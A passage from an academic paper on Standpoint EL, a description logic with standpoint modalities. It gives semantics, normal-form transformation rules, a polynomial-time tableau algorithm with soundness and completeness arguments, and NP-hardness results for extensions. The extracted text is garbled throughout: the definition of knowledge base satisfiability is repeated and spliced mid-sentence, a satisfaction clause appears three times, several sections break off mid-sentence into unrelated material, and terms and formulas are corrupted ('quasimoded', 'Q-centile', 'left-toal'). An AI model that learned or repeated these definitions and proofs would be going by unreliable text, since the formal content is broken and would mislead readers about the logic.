arbitrary statements from \(\mathcal{K}\) as _aximons_. Since the axiom types in \(\mathcal{S}\), \(\mathcal{T}\), and \(\mathcal{A}\) are syntactically well-distinguished, we sometimes identify \(\mathcal{K}\) as \(\mathcal{S}\cup\mathcal{T}\cup\mathcal{A}\). Note that all axioms except sharpening statements are preceded by modal operators (_"modalised"_ for short). In case the preceding operator happens to be \(\Box_{*}\), we may omit it. **Semantics** The semantics of standpoint \(\mathcal{EL}\) is defined via standpoint structures. Given a Standpoint DL vocabulary \(\langle N_{\mathsf{C}},N_{\mathsf{R}},N_{\mathsf{I}},N_{\mathsf{S}}\rangle\), a _description logic standpoint structure_ is a tuple \(\mathfrak{D}=\langle\Delta,\Pi,\sigma,\gamma\rangle\) where: * \(\Delta\) is a non-empty set, the _domain_ of \(\mathfrak{D}\); * \(\Pi\) is a set, called the _precisifications_ of \(\mathfrak{D}\); * \(\sigma\) is a function mapping each standpoint symbol to a non-empty subset of \(\Pi\);4 Footnote 4: As shown in Section 4, allowing for “empty standpoints” immediately incurs intractability, even for an otherwise empty vocabulary. * \(\gamma\) is a function mapping each prescification from \(\Pi\) to an "ordinary" DL interpretation \(\mathcal{I}=\langle\Delta,\mathcal{I}\rangle\) over the domain \(\Delta\), where the interpretation function \(\cdot^{\mathcal{I}}\) maps: * each concept name \(A\in N_{\mathsf{C}}\) to a set \(A^{\mathcal{I}}\subseteq\Delta\), * each role name \(R\in N_{\mathsf{R}}\) to a binary relation \(R^{\mathcal{I}}\subseteq\Delta\times\Delta\), * each individual name \(a\in N_{\mathsf{I}}\) to an element \(a^{\mathcal{I}}\in\Delta\), and we require \(a^{\gamma(\pi)}=a^{\gamma(\pi^{\prime})}\) for all \(\pi,\pi^{\prime}\in\Pi\) and \(a\in N_{\mathsf{I}}\). Note that by this definition, individual names (also referred to as constants) are interpreted rigidly, i.e., each individual name \(a\) is assigned the same \(a^{\gamma(\pi)}\in\Delta\) across all precisifications \(\pi\in\Pi\). We will refer to this uniform \(a^{\gamma(\pi)}\) by \(a^{\mathfrak{D}}\). For each \(\pi\in\Pi\), the interpretation mapping \(\mathcal{I}=\gamma(\pi)\) is extended to concept terms via structural induction as follows: \[\top^{\mathcal{I}} :=\ \Delta\] \[\bot^{\mathcal{I}} :=\ \emptyset\] \[(C_{1}\sqcap C_{2})^{\mathcal{I}} :=\ \!C_{1}^{\mathcal{I}}\sqcap C_{2}^{\mathcal{I}}\] \[(\exists R.C)^{\mathcal{I}} :=\ \left\{\delta\in\Delta\ \middle|\ \langle\delta,\varepsilon\rangle\in R^{\mathcal{I}}\text{ for some }\varepsilon\in C^{\mathcal{I}}\right\}\] We observe that modalised concepts \(\odot_{\mathsf{s}}C\) are interpreted uniformly across all precisifications \(\pi\in\Pi\), which allows us to denote their extensions with \((\odot_{\mathsf{s}}C)^{\mathfrak{D}}\). A DL standpoint structure \(\mathfrak{D}\)_satisfies a sharpening statement_\(\mathsf{s}\preceq\mathsf{s}^{\prime}\), written as \(\mathfrak{D}\models\mathsf{s}\preceq\mathsf{s}^{\prime}\), iff \(\sigma(\mathsf{s})\subseteq\sigma(\mathsf{s}^{\prime})\). For the other axiom types, satisfaction by \(\mathfrak{D}\) is defined as follows: \[\mathfrak{D} \models\Box_{\mathsf{s}}[C\sqsubseteq D] :\Longleftrightarrow C^{\gamma(\tau)}\subseteq D^{\gamma(\pi)}\text{ for each }\pi\in\sigma(\mathsf{s})\] \[\mathfrak{D} \models\Diamond_{\mathsf{s}}[C\sqsubseteq D] :\Longleftrightarrow C^{\gamma(\pi)}\subseteq D^{\gamma(\pi)}\text{ for some }\pi\in\sigma(\mathsf{s})\] \[\mathfrak{D} \models\Box_{\mathsf{s}}[C(a)] :\Longleftrightarrow a^{\mathfrak{D}}\in\bigcap_{\pi\in\sigma( \mathsf{s})}C^{\gamma(\pi)}\ (=(\Box_{\mathsf{s}}C)^{\mathfrak{D}})\] \[\mathfrak{D} \models\Diamond_{\mathsf{s}}[C(a)] :\Longleftrightarrow a^{\mathfrak{D}}\in\bigcup_{\pi\in\sigma( \mathsf{s})}C^{\gamma(\pi)}\ (=(\odot_{\mathsf{s}}C)^{\mathfrak{D}})\] \[\mathfrak{D} \models\Box_{\mathsf{s}}[R(a,b)] :\Longleftrightarrow\langle a^{\mathfrak{D}}\!,b^{\mathfrak{D}}\rangle \in\bigcap_{\pi\in\sigma(\mathsf{s})}R^{\gamma(\pi)}\] \[\mathfrak{D} \models\Diamond_{\mathsf{s}}[R(a,b)] :\Longleftrightarrow\langle a^{\mathfrak{D}}\!,b^{\mathfrak{D}} \rangle\in\bigcup_{\pi\in\sigma(\mathsf{s})}R^{\gamma(\pi)}\] \[\mathfrak{D} \models\Diamond_{\mathsf{s}}[R(a,b)] :\Longleftrightarrow\langle a^{\mathfrak{D}}\!,b^{\mathfrak{D}} \rangle\in\bigcup_{\pi\in\sigma(\mathsf{s})}R^{\gamma(\pi)}\] \[\mathfrak{D} \models\Diamond_{\mathsf{s}}[R(a,b)] :\Longleftrightarrow\langle a^{\mathfrak{D}}\!,b^{\mathfrak{D}} \rangle\in\bigcup_{\pi\in\sigma(\mathsf{s})}R^{\gamma(\pi)}\] As usual, \(\mathfrak{D}\) is a _model of \(\mathcal{S}\)_ iff it satisfies every sharpening statement in \(\mathcal{S}\); it is a _model of \(\mathcal{T}\)_ iff it satisfies every GCI \(\tau\in\mathcal{T}\); it is a _model of \(\mathcal{A}\)_ iff it satisfies every assertion \(\alpha\in\mathcal{A}\); it is a _model of \(\mathcal{K}=\langle\mathcal{S},\mathcal{T},\mathcal{A}\rangle\) (written \(\mathfrak{D}\models\mathcal{K}\)) iff it is a model of \(\mathcal{S}\) and a model of \(\mathcal{T}\) and a model of \(\mathcal{A}\). Our investigations regarding reasoning in \(\mathbb{S}\varepsilon\mathcal{L}\) will focus on standpoint versions of the well-known standard reasoning tasks, and we will make use of variations of established techniques to (directly or indirectly) reduce all of them to the first. **Knowledge base satisfiability:** Given a knowledge base \(\mathcal{K}\), \(\tau\in\mathcal{T}\); it is a _model of \(\mathcal{A}\)_ iff it satisfies every assertion \(\alpha\in\mathcal{A}\); it is a _model of \(\mathcal{K}=\langle\mathcal{S},\mathcal{T},\mathcal{A}\rangle\)_ (written \(\mathfrak{D}\models\mathcal{K}\)) iff it is a model of \(\mathcal{S}\) and a model of \(\mathcal{T}\) and a model of \(\mathcal{A}\). Our investigations regarding reasoning in \(\mathbb{S}\varepsilon\mathcal{L}\) will focus on standpoint versions of the well-known standard reasoning tasks, and we will make use of variations of established techniques to (directly or indirectly) reduce all of them to the first. **Knowledge base satisfiability:** Given a knowledge base \(\mathcal{K}\), \(\tau\in\mathcal{T}\); it is a _DL standpoint structure_\(\mathfrak{D}\) such that \(\mathfrak{D}\models\mathcal{K}\)_?_ **Axiom entailment:** Given \(\mathcal{K}\) and some \(\text{SBox}\), \(\text{TBox}\), or \(\text{ABox}\) axiom \(\phi\), does \(\mathcal{K} #### Normalisation Before we can describe a PTime algorithm for checking satisfiability of \(\mathbb{S}_{\mathcal{EC}}\) knowledge bases, we need to introduce an appropriate normal form. **Definition 1** (Normal Form of \(\mathbb{S}_{\mathcal{EC}}\) Knowledge Bases).: _A TBox \(\mathcal{T}\) is in normal form iff, for all its GCIs \(\Box_{\mathsf{s}}[C\sqsubseteq D]\), \(C\) is of the form \(A\), \(\exists R.A\) or \(A\sqcap A^{\prime}\) with \(A,A^{\prime}\!\in\!N_{\mathsf{C}}\cup\{\top\}\) and \(D\) is of the form \(B\), \(\exists R.B\), \(\Diamond_{\mathsf{s}^{\prime}}B\) or \(\Box_{\mathsf{s}^{\prime}}B\) with \(B\!\in\!N_{\mathsf{C}}\cup\{\bot\}\), where \(R\in N_{\mathsf{R}}\), and \(\mathtt{s},\mathtt{s}^{\prime}\in N_{\mathsf{S}}\). An ABox \(\mathcal{A}\) is in normal form iff all assertions have the form \(\Box_{\mathsf{s}}[A(a)]\) or \(\Box_{\mathsf{s}}[R(a,b)]\) for \(a,b\!\in\!N_{\mathsf{R}}\), \(A\!\in\!N_{\mathsf{C}}\), and \(R\!\in\!N_{\mathsf{R}}\)._ For a given \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}=\langle\mathcal{S},\mathcal{T},\mathcal{A}\rangle\), we can compute its normal form by exhaustively applying the following transformation rules (where "rule application" means that the axiom on the left-hand side is replaced with the set of axioms on the right-hand side): \[\Diamond_{\mathsf{s}}[C(a)] \to \{\mathsf{v}\!\prec\!\mathsf{s},\Box_{\mathsf{s}}[C(a)]\} \tag{11}\] \[\Diamond_{\mathsf{s}}[R(a,b)] \to \{\mathsf{v}\!\prec\!\mathsf{s},\Box_{\mathsf{s}}[R(a,b)]\}\] (12) \[\Diamond_{\mathsf{s}}[C\sqsubseteq D] \to \{\mathsf{v}\!\prec\!\mathsf{s},\Box_{\mathsf{s}}[C\sqsubseteq D]\}\] (13) \[\Box_{\mathsf{s}}[\bar{C}(a)] \to \{\Box_{\mathsf{s}}[A(a)],\Box_{\mathsf{s}}[A\sqsubseteq\bar{C}]\}\] (14) \[\Box_{\mathsf{s}}[B\sqsubseteq\exists R.C] \to \{\Box_{\mathsf{s}}[B\sqsubseteq\exists R.A],\Box_{\mathsf{s}}[A \sqsubseteq\bar{C}]\}\] (15) \[\Box_{\mathsf{s}}[B\sqsubseteq C\sqcap D] \to \{\Box_{\mathsf{s}}[B\sqsubseteq A],\Box_{\mathsf{s}}[A\sqsubseteq C ],\Box_{\mathsf{s}}[A\sqsubseteq D]\}\] (16) \[\Box_{\mathsf{s}}[C\sqsubseteq\Diamond_{\mathsf{s}}\bar{D}] \to \{\Box_{\mathsf{s}}[C\sqsubseteq_{\mathsf{s}}A],\Box_{\mathsf{s}}[A \sqsubseteq\bar{D}]\}\] (17) \[\Box_{\mathsf{s}}[C\sqsubseteq\top] \to \emptyset\quad\text{ and }\quad\Box_{\mathsf{s}}[\bot\sqsubseteq D]\to\emptyset\] (18) \[\Box_{\mathsf{s}}[\bar{3}R.\bar{C}\sqsubseteq D] \to \{\Box_{\mathsf{s}}[\bar{C}\sqsubseteq A],\Box_{\mathsf{s}}[\exists R.A\sqsubseteq D]\}\] (19) \[\Box_{\mathsf{s}}[\bar{C}\sqcap D\sqsubseteq E] \to \{\Box_{\mathsf{s}}[\bar{C}\sqsubseteq A],\Box_{\mathsf{s}}[A \sqcap D\sqsubseteq E]\}\] (20) \[\Box_{\mathsf{s}}[\Diamond_{\mathsf{s}}C\sqsubseteq D] \to \{\Box_{\mathsf{s}}[C\sqsubseteq\bot A],\Box_{\mathsf{s}}[A \sqsubseteq D]\}\] (21) \[\Box_{\mathsf{s}}[\Box_{\mathsf{u}}C\sqsubseteq D] \to \{\mathsf{v}_{0}\preceq\mathsf{u},\mathsf{v}_{1}\preceq\mathsf{u}, \Box_{\mathsf{u}}[C\sqsubseteq A],\] (22) \[\Box_{\mathsf{s}}[\Diamond_{\mathsf{v}_{0}}A\sqcap\Diamond_{ \mathsf{v}_{1}}A\sqsubseteq D]\}\] Therein, \(\bar{C}\) and \(\bar{D}\) stand for complex concept terms not contained in \(N_{\mathsf{C}}\!\cup\!\{\top\}\), and each occurrence of \(A\) on a right-hand side denotes the introduction of a fresh concept name; likewise, \(\mathsf{v}\), \(\mathsf{v}_{0}\), and \(\mathsf{v}_{1}\) denote of a fresh standpoint name. Rule (20) is applied modulo commutativity of \(\sqcap\). Most of the transformation rules should be intuitive (keep in mind that standpoints must be nonempty). A notable exception is Rule (22), which is crucial to remove boxes occurring with negative polarity. It draws some high-level inspiration from existing work on non-vacuous left-hand-side universal quantifiers in Horn DLs [1], yet the argument for its correctness requires a more intricate model-theoretic construction and hinges on "Hornness" of \(\mathcal{K}\) and nonemptiness of standpoints. A careful analysis yields that the transformation has the desired semantic and computational properties. **Lemma 1**.: _Every \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}\) can be transformed into a \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}^{\prime}\) in normal form such that:_ * \(\mathcal{K}^{\prime}\) _is a_ \(\mathbb{S}_{\mathcal{EC}}\)_-conservative extension of_ \(\mathcal{K}\)_,_ * _the size of_ \(\mathcal{K}^{\prime}\) _is at most linear in the size of_ \(\mathcal{K}\)_, and_ * _the transformation can be computed in_ PTime_._ While \(\mathcal{K}^{\prime}\) being a \(\mathbb{S}_{\mathcal{EC}}\)-conservative extension of \(\mathcal{K}\) brings about various valuable properties, what matters for our purposes is that this implies equisatisfiability of \(\mathcal{K}\) and \(\mathcal{K}^{\prime}\), thus we will not go into details about conservative extensions. ## 3 A Tableau Algorithm for Standpoint \(\mathcal{EC}\) We present a PTime tableau decision algorithm for \(\mathbb{S}_{\mathcal{EC}}\). Complexity-optimal tableau algorithms have been proposed for description logics with modal operators applied to concepts and axioms such as \(\mathbf{K}_{\mathcal{ALC}}\)[10], which is known to be in NExpTime. Our case cannot be treated in the same way, as we need to take greater care to show tractability in the end. Lutz _et al._[20] build a "quasi-model" from a tree of "quasi-worlds", which is not as easily applicable in our case, so we follow a dual approach: we will build a _quasi-model_ from a completion graph of _(quasi) domain elements_, where each of the latter is associated to a constraint system with assembled information regarding one individual's specifics in each precisification. We begin with some definitions. Given a \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}\), denote by * \(\mathsf{ST}_{\mathcal{K}}\) the elements of \(N_{\mathsf{S}}\) occurring in \(\mathcal{K}\) together with \(*\), * \(\mathsf{IN}_{\mathcal{K}}\) the set of all individual names occurring in \(\mathcal{K}\), * \(\mathsf{BC}_{\mathcal{K}}\) (_basic concepts_) the concept names used in \(\mathcal{K}\), plus \(\top\), * \(\mathsf{C}_{\mathcal{K}}\) the set of concept terms used in \(\mathcal{K}\) (with \(\mathsf{BC}_{\mathcal{K}}\subseteq\mathsf{C}_{\mathcal{K}}\)), * \(\mathsf{SF}_{\mathcal{K}}\) the set of _subformulas_ of \(\mathcal{K}\), consisting of all axioms of \(\mathcal{K}\) with and without their outer standpoint modality. A _constraint_ for \(\mathcal{K}\) is of the form \((x\!:\!C)\), \((x\!:\!a)\), \((x\!:\!\phi)\), or \((x\!:\!\mathsf{s})\),5 where \(x\) is a variable, \(C\in\mathsf{C}_{\mathcal{K}}\) a concept, \(a\in\mathsf{IN}_{\mathcal{K}}\) an individual, \(\phi\in\mathsf{SF}_{\mathcal{K}}\) a formula, and \(\mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\) a standpoint name. _Constraint systems_ are finite sets of constraints. Footnote 5: For better legibility, we will sometimes omit the parentheses. **Definition 2** ((Initial Constraint System for \(\mathcal{K}\)).: _The initial constraint system for \(\mathcal{K}\), called \(S^{\mathcal{K}}_{0}\), is the set_ \[\{x_{\mathsf{s}}\!:\!*,\ x_{\mathsf{s}}\!\!:\!\top,\ x_{\mathsf{s}}\!\!:\!\phi,\ x_{\mathsf{s}}\!:\!\mathsf{s}\!:\!\mathsf{s}\!:\!\mathsf{s}\!\mid\phi\in\mathsf{K}, \mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\}\] _A constraint system for \(\mathcal{K}\) is a finite set \(S\) of constraints for \(\mathcal{K}\) such that \(S^{\mathcal{K}}_{0}\subseteq S\) and \(\{x\!:\!*,\ x\!:\!\top\}\subseteq S\) for each \(x\) in \(S\). For a variable \(x\), let \(\mathsf{st}_{\mathcal{S}}(x)=\{\mathsf{s}\mid(x\!:\!\mathsf{s})\in S\}\) be the standpoint signature of \(x\) in \(S\). \(\Diamond\)_ Intuitively, each constraint system \(S\) produced by the algorithm corresponds to a domain element \(\varepsilon\in\Delta\) and each variable \(x\) in \(S\) corresponds to some precisification \(\pi\). Moreover, each constraint \(x\!:\!X\) in \(S\) encodes information of \(\varepsilon\) in \(\pi\). Namely, \(X\ For convenience of presentation, we use the shortcut \(\mathsf{st}_{\varepsilon}(v)\) for \(\mathsf{st}_{\delta(\varepsilon)}(v)\) and for any \(\mathbf{CG}=\langle\Delta,\$,\mathcal{L},\mathcal{R}\rangle\), we will refer to all \(\varepsilon\in\Delta\) simply as elements of \(\mathbf{CG}\). \(\mathbf{CG}\) is said to be _locally complete_ iff for every element \(\varepsilon\) in \(\mathbf{CG}\), \(\mathcal{S}(\varepsilon)\) is complete, and we call \(\mathbf{CG}\)_globally complete_ iff it is locally complete and no global completion rule (see Figure 1) is applicable to \(\mathbf{CG}\) as a whole. Intuitively, the next definition poses some global requirements for \(\mathbf{CG}\) to warrant its eligibility as a model-substitute. **Definition 4** (Coherence).: _Let \(\mathbf{CG}=\langle\Delta,\$,\mathcal{L},\mathcal{R}\rangle\) be a completion graph for \(\mathcal{K}\). \(\mathbf{CG}\) is called coherent iff_ * _for each_ \(a\in\mathsf{IN}_{\mathcal{K}}\) _there is a unique element_ \(\varepsilon_{a}\in\Delta\) _such that_ \((v\!:\!a)\in\mathcal{S}(\varepsilon_{a})\) _for all variables_ \(v\) _in_ \(\mathcal{S}(\varepsilon_{a})\)_,_ * _for each_ \(\varepsilon,\varepsilon^{\prime}\in\Delta\) _and each variable_ \(v\) _contained in_ \(\mathcal{S}(\varepsilon)\)_,_ \(\mathcal{S}(\varepsilon^{\prime})\) _contains some_ \(v^{\prime}\) _such that_ \(\mathsf{st}_{\varepsilon}(v)=\mathsf{st}_{\varepsilon^{\prime}}(v^{\prime})\)_, and_ * _if_ \((v\!:\!\phi)\!\in\!\!\mathcal{S}(\varepsilon)\) _and_ \(\mathsf{st}_{\varepsilon}(v)\!=\!\!\mathsf{st}_{\varepsilon^{\prime}}(v^{ \prime})\)_, then_ \((v^{\prime}\!:\!\phi)\!\in\!\!\mathcal{S}(\varepsilon^{\prime})\)_._ As usual in tableaux, inconsistencies emerge as clashes. **Definition 5** (Clash).: _A clash is a constraint of the form \((x\!:\!\bot)\). A completion graph \(\mathbf{CG}\) is said to contain a clash iff \(\mathcal{S}(\varepsilon)\) does for some \(\varepsilon\) in \(\mathbf{CG}\). Constraint systems or completion graphs not containing clashes are called clash-free.\(\diamondsuit\)_ **The Algorithm** To decide whether a given \(\mathbb{S}_{\mathcal{L}}\) knowledge base \(\mathcal{K}\) in normal form is satisfiable, we form the initial completion graph \(\mathbf{CG}_{I}\) with \(\mathcal{R}\!=\!\emptyset\) and \(\Delta\) consisting of an element \(\varepsilon\!\top\) with \(\mathcal{L}(\varepsilon\!\top)\!=\!\emptyset\) and \(\mathcal{S}(\varepsilon\!\top)\!=\!S_{0}^{\mathcal{K}}\), and for every \(a\!\in\!\mathsf{IN}_{\mathcal{K}}\) an element \(\varepsilon_{a}\) with \(\mathcal{L}(\varepsilon_{a})\!=\!\emptyset\) and \(\mathcal{S}(\varepsilon_{a})=S_{0}^{\mathcal{K}}\cup\{(\mathsf{xs}\!:\!a)\mid (\mathsf{xs}\!:\!\top)\in S_{0}^{\mathcal{K}}\}\). After that, we repeatedly apply the local and global completion rules from Figure 1, where LL rules have the highest priority, followed by LC, GN, and GG rules, in that order. After each rule application, we check if \(\mathbf{CG}\) contains a clash and terminate with answer "unsatisfiable" should this be the case. If we arrive at a clash-free \(\mathbf{CG}\) with no more rules applicable, the algorithm terminates and returns "satisfiable". **Quasi-Models and Quasi-Satisfiability** This section sketches how special structures, called (dual) quasi-models can serve as proxies for proper \(\mathbb{S}_{\mathcal{L}}\) models. **Global non-generating (GN) rules:** \(\mathbf{R}_{\downarrow}\) If \((x\!:\!C)\in\mathcal{S}(\varepsilon)\), \(\langle\varepsilon^{\prime},\varepsilon,x,R\rangle\in\mathcal{R}\), and \(\exists R.C\in\mathsf{C}_{\mathcal{K}}\), but \((x^{\prime}\!:\!\exists R.C)\notin\mathcal{S}(\varepsilon^{\prime})\), then set \(\mathcal{S}(\varepsilon^{\prime})\,:\,\mathcal{S}(\varepsilon^{\prime})\cup\{x ^{\prime}\!:\!\exists R.C\}\). \(\mathbf{R}_{\tau}\) If \(\{x\!:\!a,\ x\!:\!R(a,b)\}\subseteq\mathcal{S}(\varepsilon)\) and \((x^{\prime}\!:\!b)\in\mathcal{S}(\varepsilon^{\prime})\), but \(\langle\varepsilon,x,\varepsilon^{\prime},x,R\rangle\notin\mathcal{R}\), then set \(\mathcal{S}(\varepsilon^{\prime})\,:\,\mathcal{S}(\varepsilon^{\prime})\,:\, \mathcal{S}( **Polytime Termination and Correctness** Next, we give an overview of our argument why our algorithm runs in polynomial time with respect to \(\left\lVert\mathcal{K}\right\rVert\), the size of its input \(\mathcal{K}\). We observe that the number \(\left\lvert\Delta\right\rvert\) of domain elements of any completion graph \(\mathbf{CG}\) constructed by our algorithm is bounded by \(3\left\lVert\mathcal{K}\right\rVert^{2}\) (\(\dagger\)). We also find that the number of variables used in any single \(\mathcal{S}(\varepsilon)\) is bounded by \(2\left\lVert\mathcal{K}\right\rVert^{2}\) and the number of constraints in \(\mathcal{S}(\varepsilon)\) by \(2\left\lVert\mathcal{K}\right\rVert^{3}\) (\(\ddagger\)). Now, the number of applications of \(\mathbf{R}_{\exists}\) is bounded by the number of elements in each completion graph, i.e. at most \(3\left\lVert\mathcal{K}\right\rVert^{2}\) in view of (\(\dagger\)). Since the rules \(\mathbf{R}_{\preceq}\), \(\mathbf{R}_{\sqcap}\), \(\mathbf{R}_{\sqsubseteq}\), \(\mathbf{R}_{\sqcap}\), \(\mathbf{R}_{\diamond}\), \(\mathbf{R}_{g}\), \(\mathbf{R}_{a}\), \(\mathbf{R}_{r}\), \(\mathbf{R}_{r^{\prime}}\) and \(\mathbf{R}_{\downarrow}\) produce one or more new constraints in an element, the number of applications of such rules per element is bounded by \(2\left\lVert\mathcal{K}\right\rVert^{3}\) due to (\(\ddagger\)). \(\mathbf{R}_{\exists^{\prime}}\) can add, for each \(\varepsilon\) with \((C,s,x)\in\mathcal{L}(\varepsilon)\), at most one quasi-role from every variable in every element, thus we have at most \(6\left\lVert\mathcal{K}\right\rVert^{4}\) rule applications. The total number of rule applications is bounded by the rule applications per element multiplied by the bound on elements, together with the bound on \(\mathbf{R}_{\exists}\), which gives us \[(6\left\lVert\mathcal{K}\right\rVert^{4})(3\left\lVert\mathcal{K}\right\rVert ^{2})+(2\left\lVert\mathcal{K}\right\rVert^{3})(3\left\lVert\mathcal{K} \right\rVert^{2})+3\left\lVert\mathcal{K}\right\rVert^{2}\leq(27\left\lVert \mathcal{K}\right\rVert^{6}).\] **Theorem 3**.: _The completion algorithm terminates after at most \(c\left\lVert\mathcal{K}\right\rVert^{6}\) steps, where \(c\) is a constant._ As every single rule application can be clearly executed in polynomial time with respect to \(\mathcal{K}\), we can conclude that our algorithm runs in polynomial time. We are now ready to establish correctness of our decision algorithm, by showing its soundness and completeness. For both directions, Theorem 2 will come in handy. As usual, the soundness part of our argument is the easier one. **Theorem 4** (Soundness).: _If there is a globally complete, coherent and class-free completion graph \(\mathbf{CG}\) for a knowledge base \(\mathcal{K}\), then \(\mathcal{K}\) is satisfiable._ Proof.: _(sketch)_ Given \(\mathbf{CG}=\left\langle\Delta,\mathcal{S},\mathcal{L},\mathcal{R}\right\rangle\), let \(\Gamma\) consist of all runs on \(\mathbf{CG}\). Then we can show that \(\mathcal{Q}=\left\langle\Delta,\mathcal{S},\mathcal{L},\mathcal{R},\Gamma\right\rangle\) constitutes a quasi-model for \(\mathcal{K}\), so we can conclude by Theorem 2 that \(\mathcal{K}\) is satisfiable. Proving completeness requires significantly more work. We make use of a notion that, intuitively, formalizes the idea that a completion graph \(\mathbf{CG}\) under development is "in sync" with a quasi-model \(\mathcal{Q}\) of the same knowledge base, where \(\mathcal{Q}\) can be conceived as a model-theoretic "upper bound" of \(\mathbf{CG}\). **Definition 7** (\(\mathcal{Q}\)**-compatibility)**.: _Let \(\mathcal{K}\) be a \(\mathbb{S}_{\mathcal{EC}}\) knowledge base and \(\mathcal{Q}=\left\langle\Delta^{q},\mathcal{S}^{q},\mathcal{L}^{q},\mathcal{R} ^{q},\mathcal{I}^{q}\right\rangle\) be a quasimoded for \(\mathcal{K}\). A completion graph \(\mathbf{CG}=\left\langle\Delta,\mathcal{S},\mathcal{R},\mathcal{R}\right\rangle\) for \(\mathcal{K}\) is called \(\mathcal{Q}\)-centile iff there is a left-toal relation \(\mu\subseteq\Delta\times\Delta^{q}\) where \(\left\langle g,\varepsilon\right\rangle\in\Delta\), \(\left\langle g\right\rangle\subseteq\mathcal{L}^{q}(\varepsilon)\) and \(\left\langle g,\varepsilon\right\rangle,\left\langle g^{\prime},\varepsilon^{ \prime}\right\rangle\in\mu\) where \(\left\langle g,\varepsilon\right\rangle\in\mu\),_ * _for each_ \((g,\varepsilon)\in\mu\) _there is a surjective function_ \(\mu_{g,\varepsilon}\) _from the variables in_ \(\mathcal{S}^{q}(\varepsilon)\) _to the variables in_ \(\mathcal{S}(g)\) _to the variables in_ \(\mathcal{S}(g)\) _such that_ * \((\mu_{g,\varepsilon}(v)\,{:}\,\Theta)\in\mathcal{S}(g)\) _implies_ \((v\,{:}\,\Theta)\in\mathcal{S}^{q}(\varepsilon)\)_,_ * _if_ \(\left\langle g,x,g^{\prime},x^{\prime},R\right\rangle\in\mathcal{R}\) _then_ \(\left\langle\varepsilon,\!y,\!\varepsilon^{\prime},\!y^{\prime},\!R\right\rangle \in\mathcal{R}^{q}\) _for some_ \((g,\varepsilon),(g^{\prime},\varepsilon^{\prime})\in\mu\) _with_ \(\mu_{g,\varepsilon}(y)\)_=_\(x\) _and_ \(\mu_{g^{\prime},\varepsilon^{\prime}}(y^{\prime})\)_=_\(x\)_:_ \(\mathcal{Q}\)_ With this definition, we can establish two important insights: * The tableau algorithm's initial completion graph \(\mathbf{CG}_{I}\) is \(\mathcal{Q}\)-compatible for any quasimoded \(\mathcal{Q}\) of \(\mathcal{K}\). * Applications of tableau rules preserve \(\mathcal{Q}\)-compatibility. This entails that the completion graph maintained in the algorithm will be \(\mathcal{Q}\)-compatible at all times, thus also upon termination. We exploit this insight to show completeness. **Theorem 5** (Completeness).: _If a \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}\) is satisfiable, the tableau algorithm will construct a globally complete, coherent, and clash-free completion graph for \(\mathcal{K}\)._ Proof.: If \(\mathcal{K}\) is satisfiable then by Theorem 2, there is a quasi-model \(\mathcal{Q}\) for \(\mathcal{K}\). According to Theorem 3, we can obtain a globally complete completion graph \(\mathbf{CG}\) after polynomially many applications of the tableau rules, which, as just discussed, is \(\mathcal{Q}\)-compatible. It must thus also be clash-free, because otherwise there were an element \(g\) and variable \(x\), with \((x\,{:}\,\bot)\in\mathcal{S}(g)\), and thus there is \((g,\varepsilon)\in\mu\) and \(\mu_{g,\varepsilon}\) such that \((\mu_{g,\varepsilon}(x)\,{:}\,\bot)\in\mathcal{S}^{q}(\varepsilon)\), which is a contradiction because \(\mathcal{Q}\) is a quasi-model. It is not hard to show that \(\mathbf{CG}\) is also coherent, whence we can conclude that \(\mathbf{CG}\) is a globally complete, coherent, and clash-free completion graph for \(\mathcal{K}\). Together with the well-known PTime-hardness of the satisfiability problem in (standpoint-free) \(\mathcal{EL}\), we have therefore established PTime-completeness of \(\mathbb{S}_{\mathcal{EL}}\) and exhibited a worst-case optimal algorithm for it. ## 4 Intractable Extensions While the shown tractability of reasoning in \(\mathbb{S}_{\mathcal{EL}}\) is good news, one might ask if one could include more modelling features or relax certain side conditions and still preserve tractability. This section shows that tractability can be easily lost (at least under standard complexity-theoretic assumptions). **Empty standpoints** While it may make sense on a philosophical level, one might wonder whether the constraint that \(\sigma(\mathsf{s})\) needs to be nonempty for every \(\mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\) has an impact on tractability. In fact, dropping this constraint, obtaining a logic \(\mathbb{S}_{\mathcal{EC}}^{\emptyset}\) with the same syntax but modified semantics, would increase expressivity (standpoint non-emptiness could still be enforced in \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) by asserting \(\top\sqsubseteq\zeta_{\mathsf{s}}\top\) for every \(\mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\)). However, satisfiability in \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) turns out to be NP-hard, even when disallowing usage of concept and role names entirely. The key insight that both \(\zeta_{\mathsf{s}}\top\) and its negation \(\sqsubseteq_{\mathsf{s}}\bot\) can be expressed as \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) concepts gives rise to the following reduction from 3SAT: Assume an instance \(\phi=\bigvee\mathbf{C}_{1}\,\wedge\,\ldots\,\wedge\bigvee\mathbf{C}_{n}\) of 3SAT containing \(n\) clauses (i.e., disjunctions of literals) \(\bigvee\mathbf{C}_{j}\) over the propositional variables \(P=\{p_{1},\ldots,p_{k}\}\). We note that \(\phi\) is equivalent to \((\bigwedge\overline{\mathbf{C}}_{1}\to\mathbf{false})\wedge\ldots\wedge( \bigwedge\overline{\mathbf{C}}_{k}\to\mathbf{false})\), where \(\overline{\mathbf{C}}_{j}\) is obtained from \(\mathbf{C}_{j}\) by replacing every literal by its negated version. Let now \(\{\mathsf{s}_{1},\ldots,\mathsf{s}_{k}\}\) be a set of standpoint names and, for any literal \(\ell\) over \(P\), define \[L_{\ell}=\begin{cases}\mathbf{\mathsf{s}_{\sqcap}}\top&\text{ if }\ell=p_{i},\\ \Box_{\mathsf{s}_{\perp}}\bot&\text{ if }\ell=\neg p_{i}.\end{cases}\] Then, \(\phi\) is satisfiable iff the following \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\ **Rigid roles** \(\mathbb{S}_{\mathcal{EL}}\) allows to globally enforce rigidity of specific concepts through axioms of the shape \(A\sqsubseteq\square_{*}A\). (This is in contrast to e.g. \(\mathbf{K}_{n}\mathcal{ALC}\), where rigidity of concepts can only be expressed _relative_ to a given formula.) In a similar manner, 